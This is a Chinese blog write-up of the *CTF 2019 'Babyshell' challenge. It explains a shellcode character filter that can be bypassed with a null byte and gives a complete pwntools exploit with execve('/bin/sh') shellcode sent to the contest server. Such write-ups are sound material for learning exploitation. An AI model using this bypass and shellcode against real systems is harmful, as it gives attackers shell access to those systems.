Starctf2019_Babyshell

挺有意思的一题…PPP太强了..

start

binary
一放题目没几分钟被ppp秒掉了…tql…

analysis

一开始没仔细看以为是一题指定字符域的shellcode题和pwnable.tw上的deathnote,alivenote,MnO2挺像的…
后来发现好像检测的地方有点问题可以\x00截断

1
2
3
4
5
6
7
for ( i = a1; *i; ++i )
{
for ( j = &asc; *j && *j != *i; ++j )
;
if ( !*j )
return 0LL;
}

*i为0就退出了所以可以截断.

漏洞利用

通过已有的字符和\x00组成不会crashshellcod然后写上shshellcode就可以了

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *
context.log_level='debug'
context.arch='amd64'
#p=process('./shellcode')
#gdb.attach(p,'b *0x4008cb')
p=remote("34.92.37.22",10002)

sh='''
xor rax,rax
mov al,0x3b
xor rsi,rsi
xor rdi,rdi
xor rdx,rdx
mov rdi,0x68732f6e69622f
push rdi
mov rdi,rsp
syscall
'''
sh=asm(sh)
p.sendlineafter(":","\x00gs\njaZ"+sh)
p.interactive()
'''
[_]: pop rdi
[Z]: pop rdx
'''
Author: n132!
Link: https://n132.github.io/2019/04/29/2019-04-29-Starctf2019-Babyshell/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.